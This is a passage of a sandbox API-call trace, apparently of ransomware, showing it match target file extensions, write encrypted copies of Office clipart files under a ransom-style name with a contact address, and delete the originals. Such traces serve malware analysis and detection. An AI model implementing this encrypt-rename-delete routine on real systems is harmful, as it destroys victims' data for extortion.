lpString2=".WMF") returned -1 [0181.678] lstrlenW (lpString=".docx") returned 5 [0181.678] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0181.678] lstrlenW (lpString=".pdf") returned 4 [0181.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.678] lstrlenW (lpString=".xls") returned 4 [0181.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.678] lstrlenW (lpString=".xlsx") returned 5 [0181.678] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0181.678] lstrlenW (lpString=".ppt") returned 4 [0181.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.678] lstrlenW (lpString=".zip") returned 4 [0181.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.678] lstrlenW (lpString=".rar") returned 4 [0181.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.678] lstrlenW (lpString=".bz2") returned 4 [0181.679] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.679] lstrlenW (lpString=".7z") returned 3 [0181.679] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.679] lstrlenW (lpString=".dbf") returned 4 [0181.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.679] lstrlenW (lpString=".1cd") returned 4 [0181.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.679] lstrlenW (lpString=".jpg") returned 4 [0181.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.679] lstrlenW (lpString=".doc") returned 4 [0181.679] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.679] lstrlenW (lpString=".docx") returned 5 [0181.679] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0181.679] lstrlenW (lpString=".pdf") returned 4 [0181.679] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.679] lstrlenW (lpString=".xls") returned 4 [0181.679] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.679] lstrlenW (lpString=".xlsx") returned 5 [0181.679] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0181.679] lstrlenW (lpString=".ppt") returned 4 [0181.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.680] lstrlenW (lpString=".zip") returned 4 [0181.680] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.680] lstrlenW (lpString=".rar") returned 4 [0181.680] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.680] lstrlenW (lpString=".bz2") returned 4 [0181.680] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.680] lstrlenW (lpString=".7z") returned 3 [0181.680] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.680] lstrlenW (lpString=".dbf") returned 4 [0181.680] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.680] lstrlenW (lpString=".1cd") returned 4 [0181.680] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.680] lstrlenW (lpString=".jpg") returned 4 [0181.680] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.680] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.680] lstrlenW (lpString="J0105386.WMF") returned 12 [0181.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.681] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=5980) returned 1 [0181.681] CloseHandle (hObject=0x370) returned 1 [0181.681] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf")) returned 0x220 [0181.681] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.682] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.682] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.682] GetLastError () returned 0x0 [0181.682] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x175c, lpOverlapped=0x0) returned 1 [0181.775] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1760, lpOverlapped=0x0) returned 1 [0182.039] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.039] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.039] SetEndOfFile (hFile=0x374) returned 1 [0182.039] CloseHandle (hObject=0x374) returned 1 [0182.039] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.039] SetEndOfFile (hFile=0x370) returned 1 [0182.040] CloseHandle (hObject=0x370) returned 1 [0182.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf")) returned 1 [0182.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.041] lstrlenW (lpString=".doc") returned 4 [0182.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.041] lstrlenW (lpString=".docx") returned 5 [0182.041] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.041] lstrlenW (lpString=".pdf") returned 4 [0182.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.041] lstrlenW (lpString=".xls") returned 4 [0182.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.041] lstrlenW (lpString=".xlsx") returned 5 [0182.041] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.041] lstrlenW (lpString=".ppt") returned 4 [0182.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.041] lstrlenW (lpString=".zip") returned 4 [0182.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.041] lstrlenW (lpString=".rar") returned 4 [0182.042] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString=".bz2") returned 4 [0182.042] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString=".7z") returned 3 [0182.042] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.042] lstrlenW (lpString=".dbf") returned 4 [0182.042] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.042] lstrlenW (lpString=".1cd") returned 4 [0182.042] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.042] lstrlenW (lpString=".jpg") returned 4 [0182.042] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.042] lstrlenW (lpString=".doc") returned 4 [0182.042] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString=".docx") returned 5 [0182.042] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.042] lstrlenW (lpString=".pdf") returned 4 [0182.042] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString=".xls") returned 4 [0182.042] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.042] lstrlenW (lpString=".xlsx") returned 5 [0182.042] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.042] lstrlenW (lpString=".ppt") returned 4 [0182.042] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.043] lstrlenW (lpString=".zip") returned 4 [0182.043] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.043] lstrlenW (lpString=".rar") returned 4 [0182.043] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.043] lstrlenW (lpString=".bz2") returned 4 [0182.043] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.043] lstrlenW (lpString=".7z") returned 3 [0182.043] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.043] lstrlenW (lpString=".dbf") returned 4 [0182.043] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.043] lstrlenW (lpString=".1cd") returned 4 [0182.043] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 68 [0182.043] lstrlenW (lpString=".jpg") returned 4 [0182.043] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.043] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.043] lstrlenW (lpString="J0105410.WMF") returned 12 [0182.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.044] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=20444) returned 1 [0182.044] CloseHandle (hObject=0x370) returned 1 [0182.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf")) returned 0x220 [0182.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.044] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.045] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0182.046] GetLastError () returned 0x0 [0182.046] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4fdc, lpOverlapped=0x0) returned 1 [0182.048] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4fe0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4fe0, lpOverlapped=0x0) returned 1 [0182.049] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.049] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.050] SetEndOfFile (hFile=0x374) returned 1 [0182.050] CloseHandle (hObject=0x374) returned 1 [0182.050] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.050] SetEndOfFile (hFile=0x370) returned 1 [0182.051] CloseHandle (hObject=0x370) returned 1 [0182.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf")) returned 1 [0182.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.052] lstrlenW (lpString=".doc") returned 4 [0182.052] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.052] lstrlenW (lpString=".docx") returned 5 [0182.052] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.052] lstrlenW (lpString=".pdf") returned 4 [0182.052] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.052] lstrlenW (lpString=".xls") returned 4 [0182.052] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.052] lstrlenW (lpString=".xlsx") returned 5 [0182.052] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.052] lstrlenW (lpString=".ppt") returned 4 [0182.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.052] lstrlenW (lpString=".zip") returned 4 [0182.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.052] lstrlenW (lpString=".rar") returned 4 [0182.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.052] lstrlenW (lpString=".bz2") returned 4 [0182.052] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.052] lstrlenW (lpString=".7z") returned 3 [0182.052] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.052] lstrlenW (lpString=".dbf") returned 4 [0182.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.053] lstrlenW (lpString=".1cd") returned 4 [0182.053] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.053] lstrlenW (lpString=".jpg") returned 4 [0182.053] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.053] lstrlenW (lpString=".doc") returned 4 [0182.053] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString=".docx") returned 5 [0182.053] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.053] lstrlenW (lpString=".pdf") returned 4 [0182.053] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString=".xls") returned 4 [0182.053] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.053] lstrlenW (lpString=".xlsx") returned 5 [0182.053] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.053] lstrlenW (lpString=".ppt") returned 4 [0182.053] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.053] lstrlenW (lpString=".zip") returned 4 [0182.053] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.053] lstrlenW (lpString=".rar") returned 4 [0182.053] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString=".bz2") returned 4 [0182.053] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString=".7z") returned 3 [0182.053] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.053] lstrlenW (lpString=".dbf") returned 4 [0182.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.054] lstrlenW (lpString=".1cd") returned 4 [0182.054] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 68 [0182.054] lstrlenW (lpString=".jpg") returned 4 [0182.054] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.054] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.054] lstrlenW (lpString="J0105412.WMF") returned 12 [0182.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.054] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=9400) returned 1 [0182.055] CloseHandle (hObject=0x370) returned 1 [0182.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf")) returned 0x220 [0182.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.055] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.055] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0182.055] GetLastError () returned 0x0 [0182.056] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x24b8, lpOverlapped=0x0) returned 1 [0182.057] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x24c0, lpOverlapped=0x0) returned 1 [0182.061] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.061] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.061] SetEndOfFile (hFile=0x374) returned 1 [0182.061] CloseHandle (hObject=0x374) returned 1 [0182.061] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.061] SetEndOfFile (hFile=0x370) returned 1 [0182.062] CloseHandle (hObject=0x370) returned 1 [0182.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.062] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf")) returned 1 [0182.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.063] lstrlenW (lpString=".doc") returned 4 [0182.063] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.063] lstrlenW (lpString=".docx") returned 5 [0182.063] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.063] lstrlenW (lpString=".pdf") returned 4 [0182.063] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.063] lstrlenW (lpString=".xls") returned 4 [0182.063] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.063] lstrlenW (lpString=".xlsx") returned 5 [0182.063] lstrcmpiW (lpString1=".xlsx", 